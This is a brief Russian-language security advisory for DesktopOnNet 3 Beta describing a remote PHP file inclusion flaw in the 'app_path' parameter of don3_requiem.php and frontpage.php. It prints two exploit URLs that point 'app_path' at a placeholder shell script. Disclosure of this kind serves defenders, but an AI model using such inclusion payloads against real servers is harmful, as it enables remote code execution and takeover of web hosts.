Программа: DesktopOnNet 3 Beta

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «app_path» сценариями don3_requiem.php и
frontpage.php. Удаленный пользователь может выполнить произвольный PHP сценарий
на целевой системе с привилегиями Web сервера.

Эксплоит:

http://127.0.0.1/DON3/applications/don3_requiem.don3app/
don3_requiem.php?app_path=SH3LL?
http://127.0.0.1/DON3/applications/frontpage. don3app/frontpage.php?app_path=SH3LL?



Оставить мнение